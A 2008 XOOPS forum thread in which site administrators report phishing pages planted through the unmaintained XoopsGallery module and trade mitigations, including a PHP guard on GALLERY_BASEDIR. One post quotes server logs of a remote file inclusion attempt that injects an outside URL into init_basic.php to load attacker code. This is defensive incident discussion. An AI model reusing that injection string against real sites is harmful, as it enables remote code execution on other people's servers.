1
Northern
XoopsGallery Easly Hacked
  • 2008/1/9 22:24

  • Northern

  • Just can't stay away

  • Posts: 420

  • Since: 2004/12/26


I just got done removing 8 phishing site out of a single xoopsgallery folder, these little sites are like ticks.
all over the place in oddball places and not all of them seemed what they were.

I went to http://www.xoopsgallery.org but they seen to be closed or down at this time, as it was yesterday. and the day prior.

I would advise you to check your xoopsgallery module, look throught all folders and look for a all CAPS ( all upper case LETTERED ) folder, that would be the easiest way to find them.


This would be a wise thing to do sence ive just finished with the 4th xoopsgallery with this problem in under 2 weeks. none of the saiute are on the same servers or hosts, the version of XOOPS gallery was 3.3.3.7, 3.3.3.9, and 2.1

Flag it, bug it, report it, what ever you like, but its come apparent that theres a problem.


Marc.

2
BlueStocking
Re: XoopsGallery Easly Hacked

TO:
QuarantinedModules

@Irmtfan, D. J.
I have NOT removed it from the SourceForge list. That is for your determination. Please let me know what you do.

Thanks,

QUESTION: http://www.dhps.ylc.edu.tw/~demo/x96/modules/fileup/view_file.php?fsn=3 should be warned. I do not speak the language. (Chinese)

Is this the same module that Northern just reported on?

BS
hhttps://xoops.org/modules/repository .. It is time to get involved - XOOPS.ORG

3
Northern
Re: XoopsGallery Easly Hacked
  • 2008/1/10 0:34

  • Northern

  • Just can't stay away

  • Posts: 420

  • Since: 2004/12/26


Quote:

BlueStocking wrote:
TO:
QuarantinedModules

@Irmtfan, D. J.
I have NOT removed it from the SourceForge list. That is for your determination. Please let me know what you do.



From the looks of things in xoopsinfo< click the link. the Xoopsgallery has fallen into disrepair and is nologer.
its now a orphin. along with the websites .org,.com

I tried to contact Glen via email but i get my message back in under 2 sec. lol.


Quote:

QUESTION: http://www.dhps.ylc.edu.tw/~demo/x96/modules/fileup/view_file.php?fsn=3 should be warned. I do not speak the language. (Chinese)

Is this the same module that Northern just reported on?

BS



from the looks of the download file ( Xoopsgallery-1_3_3_7.zip ) its the same module.

Update:
most common ways for a phishing site to access your site is.
1. search box
2. javascript-from faulty html
3. faulty html


now if you noticed, all version of xoopsgallery have there own search box in the index page. Ive just removed the search form in the templates, and cmod ( 444 ) the search.php file. the hide the search opp in the xoops_version.php.

this is not a fix, but to help elemanate the problem, ive still got alot of source checking to do.

4
EastEnd99
Re: XoopsGallery Easly Hacked
  • 2008/1/10 13:45

  • EastEnd99

  • Just popping in

  • Posts: 1

  • Since: 2005/9/4 1


This is a (sanitized) messages log from my webserver:
Jan  6 18:06:47 httpdPHP Warning:  main(): URL file-access is disabled in the server configuration in /..../modules/xoopsgallery/init_basic.php on line 83
Jan  6 18
:06:47 httpdPHP Warning:  main(http://kamekfm.org/test.txt???platform/fs_unix.php): failed to open stream: no suitable wrapper could be found in ../modules/xoopsgallery/init_basic.php on line 83
Jan  6 18:06:47 httpdPHP Fatal error:  main(): Failed opening required 'http://kamekfm.org/test.txt???platform/fs_unix.php' (include_path='.:/usr/share/pear-addons:/usr/share/pear'in ../modules/xoopsgallery/init_basic.php on line 83


Line 83 of init_basic.php shows the $GALLERY_BASEDIR variable is replaced by an external URL at runtime. These external references vary each time. My knowledge of PHP is limited: I cannot figure out which code is responsible for the value of this variable at runtime. I am stuck.

Am I looking at the same hack situation?
If it is: The hack does not seem to have any consequences: I can not find strange files inside the xoopsgallery directory structure. May be turning off URL file-access in the servers PHP configuration disables the hack. Other posiblity may be the hack check in each php file should be extended (it validates empty $GALLERY_BASEDIR variables) to make sure it is pointing to the local XOOPS installation.

If I can be of any help, please let me know.

EE99

5
deano42
Re: XoopsGallery Easly Hacked
  • 2008/1/11 23:55

  • deano42

  • Just popping in

  • Posts: 13

  • Since: 2006/4/26


I've had the same issue this week, does anyone know where you can get the latest version of XOOPS Gallery now that the site is down? I have some repairing to do...

Thanks

Dean

6
script_fu
Re: XoopsGallery Easly Hacked

The best solution is not to use the module at all.

Try one that a dev still supports...

example

http://www.zoullou.net/

7
MadFish
Re: XoopsGallery Easly Hacked
  • 2008/1/12 6:46

  • MadFish

  • Friend of XOOPS

  • Posts: 1056

  • Since: 2003/9/27


XoopsGallery was well maintained for years, it is a shame it if it is not maintained anymore.

This kind of thing is why XOOPS needs to designate some 'core modules', that will give users (especially business) some assurance of ongoing support.

8
bubuche93
Re: XoopsGallery Easly Hacked
  • 2008/1/12 15:01

  • bubuche93

  • Just popping in

  • Posts: 25

  • Since: 2006/11/19


is XOOPS gallery the same as xcgallery?

9
pjeutr
Re: XoopsGallery Easly Hacked
  • 2008/1/12 21:07

  • pjeutr

  • Just popping in

  • Posts: 2

  • Since: 2005/11/8


Try adding the following at the top of init_basic.php
Seems to work for me, dunno why it should be possible that the base base can be a url.

// Hack prevention.
if (!empty($_REQUEST["GALLERY_BASEDIR"])) {
error_log("Security violation\n" .$_REQUEST["GALLERY_BASEDIR"]);
exit;
}

10
BlueStocking
Re: XoopsGallery Easly Hacked

SEE News report

http://codex.gallery2.org/Main_Page

http://codex.gallery2.org/Gallery2ownload#Packages

http://codex.gallery2.org/Integration
SEE: [XOOPS Download CMS/Portal alpha G2.0(.x) greyhair]

Maybe the link above will help. I am not a module developer so I would not know for certain but it appears XOOPSGallery 2 was designed on this platform, so maybe you or someone will re-xoopsify it.

Sidenote: Beautiful Wiki support.
hhttps://xoops.org/modules/repository .. It is time to get involved - XOOPS.ORG

Login

Who's Online

411 user(s) are online (319 user(s) are browsing Support Forums)


Members: 0


Guests: 411


more...

Donat-O-Meter

Stats
Goal: $100.00
Due Date: Nov 30
Gross Amount: $0.00
Net Balance: $0.00
Left to go: $100.00
Make donations with PayPal!

Latest GitHub Commits